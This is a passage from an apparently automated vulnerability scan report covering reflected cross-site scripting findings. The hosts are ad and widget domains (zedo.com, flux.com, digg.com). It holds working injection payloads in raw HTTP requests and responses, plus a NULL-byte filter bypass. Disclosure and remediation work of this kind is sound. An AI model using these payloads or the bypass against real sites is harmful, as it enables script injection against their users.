The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64836'%3balert(1)//5b6a7cc0c87 was submitted in the q parameter. This input was echoed as 64836';alert(1)//5b6a7cc0c87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-407/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=13&d=14&q=64836'%3balert(1)//5b6a7cc0c87&$=&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:07:43 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "2802d0e-87f1-4a4a580e6a180"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=69
Expires: Mon, 13 Jun 2011 11:08:52 GMT
Date: Mon, 13 Jun 2011 11:07:43 GMT
Content-Length: 2434
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='64836';alert(1)//5b6a7cc0c87';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=64836';alert(1)//5b6a7cc0c87;z="+Math.random();}

if(zzuid=='unknown')zzuid='lYrOTcGt89Yz1ao6zwEmLiof~051411';

var zzhasAd
...[SNIP]...

4.116. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-407/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e08a9"%3balert(1)//5adc2ca10e9 was submitted in the q parameter. This input was echoed as e08a9";alert(1)//5adc2ca10e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-407/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=13&d=14&q=e08a9"%3balert(1)//5adc2ca10e9&$=&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:07:42 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "2802d0e-87f1-4a4a580e6a180"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=70
Expires: Mon, 13 Jun 2011 11:08:52 GMT
Date: Mon, 13 Jun 2011 11:07:42 GMT
Content-Length: 2434
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='e08a9";alert(1)//5adc2ca10e9';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=e08a9";alert(1)//5adc2ca10e9;z="+Math.random();}

if(zzuid=='unknown')zzuid='lYrOTcGt89Yz1ao6zwEmLiof~051411';

var zzhasAd=undefined;


...[SNIP]...

4.117. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-407/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25e72'%3balert(1)//ab02bc723ef was submitted in the $ parameter. This input was echoed as 25e72';alert(1)//ab02bc723ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-407/d3/jsc/fmr.js?c=1&a=0&f=&n=1190&r=13&d=14&q=&$=25e72'%3balert(1)//ab02bc723ef&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:25e72';alert(1)//ab02bc723ef;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:07:47 GMT;path=/;domain=.zedo.com;
ETag: "e2185d-85e6-4a4a581422f00"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=65
Expires: Mon, 13 Jun 2011 11:08:52 GMT
Date: Mon, 13 Jun 2011 11:07:47 GMT
Content-Length: 2437
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',25e72';alert(1)//ab02bc723ef';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,25e72';alert(1)//ab02bc723ef;z="+Math.random();}

if(zzuid=='unknown')zzuid='lYrOTcGt89Yz1ao6zwEmLiof~051411';

var zzhasA
...[SNIP]...

4.118. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-407/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77d71"%3balert(1)//149bbdc5fd3 was submitted in the $ parameter. This input was echoed as 77d71";alert(1)//149bbdc5fd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-407/d3/jsc/fmr.js?c=1&a=0&f=&n=1190&r=13&d=14&q=&$=77d71"%3balert(1)//149bbdc5fd3&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:77d71";alert(1)//149bbdc5fd3;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:07:47 GMT;path=/;domain=.zedo.com;
ETag: "e2185d-85e6-4a4a581422f00"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=65
Expires: Mon, 13 Jun 2011 11:08:52 GMT
Date: Mon, 13 Jun 2011 11:07:47 GMT
Content-Length: 2437
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',77d71";alert(1)//149bbdc5fd3';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,77d71";alert(1)//149bbdc5fd3;z="+Math.random();}

if(zzuid=='unknown')zzuid='lYrOTcGt89Yz1ao6zwEmLiof~051411';

var zzhasAd=undefined;


...[SNIP]...

4.119. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-407/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6798e'%3balert(1)//ac9423e96e6 was submitted in the q parameter. This input was echoed as 6798e';alert(1)//ac9423e96e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-407/d3/jsc/fmr.js?c=1&a=0&f=&n=1190&r=13&d=14&q=6798e'%3balert(1)//ac9423e96e6&$=&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:07:41 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "e2185d-85e6-4a4a581422f00"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=71
Expires: Mon, 13 Jun 2011 11:08:52 GMT
Date: Mon, 13 Jun 2011 11:07:41 GMT
Content-Length: 2434
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='6798e';alert(1)//ac9423e96e6';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=6798e';alert(1)//ac9423e96e6;z="+Math.random();}

if(zzuid=='unknown')zzuid='lYrOTcGt89Yz1ao6zwEmLiof~051411';

var zzhasAd
...[SNIP]...

4.120. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-407/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70159"%3balert(1)//d878d3d5c5 was submitted in the q parameter. This input was echoed as 70159";alert(1)//d878d3d5c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-407/d3/jsc/fmr.js?c=1&a=0&f=&n=1190&r=13&d=14&q=70159"%3balert(1)//d878d3d5c5&$=&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:07:41 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "e2185d-85e6-4a4a581422f00"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=71
Expires: Mon, 13 Jun 2011 11:08:52 GMT
Date: Mon, 13 Jun 2011 11:07:41 GMT
Content-Length: 2432
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='70159";alert(1)//d878d3d5c5';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=70159";alert(1)//d878d3d5c5;z="+Math.random();}

if(zzuid=='unknown')zzuid='lYrOTcGt89Yz1ao6zwEmLiof~051411';

var zzhasAd=undefined;


...[SNIP]...

4.121. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/ [callback parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://daapiak.flux.com
Path:   /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload da811(a)88448242ef8 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/?q=http%3A%2F%2Fmoviesblog.mtv.com%2F2011%2F06%2F12%2Fgame-of-thrones-spoiler-death-sean-bean%2F&callback=FFEAA0CC93007da811(a)88448242ef8 HTTP/1.1
Host: daapiak.flux.com
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Server: w08g
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wg
Content-Length: 6223
Cache-Control: max-age=600
Date: Mon, 13 Jun 2011 11:24:01 GMT
Connection: close

if (typeof(FFEAA0CC93007da811(a)88448242ef8) == 'function'){FFEAA0CC93007da811(a)88448242ef8({"Title":"'Game Of Thrones': About Tonight's Big Spoiler...","Ucid":"D3FCFFFF0002D51D001B01477BA2","Thumbnails":{"CustomTemplate":"http:\/\/filesll.flu
...[SNIP]...

4.122. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/Usage [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://daapiak.flux.com
Path:   /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/Usage

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1e121%3balert(1)//f8f1d10d0d7 was submitted in the callback parameter. This input was echoed as 1e121;alert(1)//f8f1d10d0d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/Usage?q=http%3A%2F%2Fmoviesblog.mtv.com%2F2011%2F06%2F12%2Fgame-of-thrones-spoiler-death-sean-bean%2F&callback=F65FF440430071e121%3balert(1)//f8f1d10d0d7 HTTP/1.1
Host: daapiak.flux.com
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Server: w10g
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wg
Content-Length: 507
Cache-Control: max-age=600
Date: Mon, 13 Jun 2011 11:24:06 GMT
Connection: close

if (typeof(F65FF440430071e121;alert(1)//f8f1d10d0d7) == 'function'){F65FF440430071e121;alert(1)//f8f1d10d0d7({"CommentCount":0,"CommentData":null,"GainRatingCount":0,"IsFirstPage":false,"IsInvisible":false,"IsLastPage":false,"OverallFiveStarRating":0,"
...[SNIP]...

4.123. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/UI/ShareService/Services [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://daapiak.flux.com
Path:   /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/UI/ShareService/Services

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload aa1cc%3balert(1)//f751d8e6f88 was submitted in the callback parameter. This input was echoed as aa1cc;alert(1)//f751d8e6f88 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/UI/ShareService/Services?earlyServicesOnly=false&callback=F3230BE7B3007aa1cc%3balert(1)//f751d8e6f88 HTTP/1.1
Host: daapiak.flux.com
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Server: w07g
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wg
Content-Length: 9655
Cache-Control: max-age=600
Date: Mon, 13 Jun 2011 11:23:59 GMT
Connection: close

if (typeof(F3230BE7B3007aa1cc;alert(1)//f751d8e6f88) == 'function'){F3230BE7B3007aa1cc;alert(1)//f751d8e6f88([{"__type":"ExternalShareServiceData","LargeThumbnailUrl":null,"Sections":"","ShareType":"flux","SystemName":"flux","ThumbnailUrl":"http:\/\/st
...[SNIP]...

4.124. http://digg.com/tools/diggthis.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /tools/diggthis.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005a7b2"><script>alert(1)</script>874123e3b2f was submitted in the REST URL parameter 1. This input was echoed as 5a7b2"><script>alert(1)</script>874123e3b2f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /%005a7b2"><script>alert(1)</script>874123e3b2f/diggthis.js HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
Referer: http://www.gamershell.com/news_118846.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:23:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=8144478524238096536%3A211; expires=Tue, 14-Jun-2011 11:23:31 GMT; path=/; domain=digg.com
Set-Cookie: d=5634eb57baa7c24c984b568442a99c3c7b2efae6ecb9a20afd4dcf647acdc70f; expires=Sat, 12-Jun-2021 21:31:11 GMT; path=/; domain=.digg.com
X-Digg-Time: D=347865 10.2.128.186
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 17743

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/%005a7b2"><script>alert(1)</script>874123e3b2f/diggthis.js.rss">
...[SNIP]...

4.125. http://digg.com/tools/diggthis.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /tools/diggthis.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f62e6"><script>alert(1)</script>b012967b31b was submitted in the REST URL parameter 2. This input was echoed as f62e6"><script>alert(1)</script>b012967b31b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

